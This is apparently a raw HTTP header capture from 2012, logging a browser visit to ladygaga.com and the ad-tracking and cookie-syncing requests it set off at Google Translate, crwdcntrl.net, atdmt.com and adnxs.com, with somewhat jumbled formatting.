Host: translate.googleapis.com
GET /translate_a/l?client=te&amp;alpha=true&amp;hl=en&amp;cb=_callbacks_._0h9791pc8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:49 GMT
Expires: Tue, 06 Nov 2012 16:44:49 GMT
Cache-Control: private, max-age=86400
Content-Language: en
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 652
X-XSS-Protection: 1; mode=block
GET /map/c=281/rand=93929643/tpid=5858721859426781856/tp=ANXS HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=781084718/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdo3%2F%2F%2F%2F%2FzcDAaHVtjuZakBiDUO80JyYGthwGhv%2BMjAzMq4A0AyMQMjAL%2FKyDSTBAJRjAEs3KktglemfNxG5Ug6AyDqOkjHAYtWEbLh152CUEvh3CIfEzGodRP3VwWH66F7s%2Fmn%2Fq4dCxSRWXhBp2iRTfeThcxdOEQ4LtK3YJBj7uhF2YDuZO2IkpOFFHAcphBHGWIXMKkTlbEBxlrjeYBnE%2BuY1F8PFTTMF2wcOYggWLzmEKOv1bhCnIVyWIzczXmIIAoUybhA%3D%3D&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGnXyMDAaHVtjuZaBg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A3h8Low%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 16:44:50 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.11.20
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 65
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:49 GMT
Connection: close
Content-Length: 381
GET /msftcookiehandler?t=1&c= HTTP/1.1

Host: m.adnxs.com
GET /msftcookiehandler?t=1&amp;c= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:50 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:50 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Tue, 06 Nov 2012 16:44:50 GMT
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; sess=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:52 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:52 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.Ii!9ZZKnmJW/Aq[R'TxPDt/pm(sVL/EhDnHk.SUEc21ch&gt;:/sDPPi5fW; path=/; expires=Mon, 04-Feb-2013 16:44:52 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Tue, 06 Nov 2012 16:44:52 GMT